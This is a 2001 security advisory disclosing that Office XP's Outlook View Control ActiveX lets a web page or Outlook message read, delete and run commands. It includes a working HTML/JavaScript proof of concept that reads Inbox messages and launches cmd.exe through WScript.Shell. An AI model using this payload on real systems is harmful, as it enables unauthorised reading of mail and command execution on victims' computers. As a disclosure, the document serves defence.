|
Systems
affected:
Win2K + IE 5.5 SP1 fully patched + Office XP.
It was reported to work with IE6 beta also.
Risk: High
Date: 12 July 2001
Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You
may distribute it unmodified. You may not modify it and distribute
it or distribute parts of it without the author's written
permission.
Disclaimer:
The information in this advisory is believed to be true
based on experiments though it may be false. The opinions expressed
in this advisory and program are my own and not of any company.
The
usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect
use of the information or functionality provided by this advisory or
program. Georgi Guninski bears no responsibility for content or
misuse of this advisory or program or any derivatives thereof.
If you want to link to this advisory or reference it use
the URL:
http://www.guninski.com/vv2xp.html
The above especially applies for companies like Mitre and
BugNet
Background:
Recently I bought Office XP.
It was quite unpleasant feeling giving so much money for so
buggy product.
Description:
If a user visits a specially designed html page with IE or
opens or previews a message with Outlook XP arbitrary commands may
be executed on his computer. This may lead to taking full control
over user's computer. Using another approach to this bug allows
reading, modifying and deleting messages in user's Outlook XP
folders.
Details:
The problem is again ActiveX. This time Office XP seems to
install a malicous ActiveX control - "Microsoft Outlook View
Control". This control exposes property named "selection" which
gives access to user's mail messages. It also exposes the Outlook
"Application" object which may lead to execution of arbitrary
programs of the user's computer. Examine the script below for more
information
Demonstration:
http://www.guninski.com/vv3-2demo.html
-----------------------------------------------------
This assumes you have at least one message in Outlook XP's
Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>
<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
vv2=vv1.Session.Application.CreateObject("WScript.Shell");
alert("Much more fun is possible");
vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\
");
}
setTimeout("f()",2000);
</script>
-----------------------------------------------------
Solution:
Uninstall Office XP and Windows.
Vendor status:
Microsoft was informed on 9 July 2001.
As far I could understand they are still investigating my
report.
Credits
Regards,
Georgi Guninski
http://www.guninski.com
|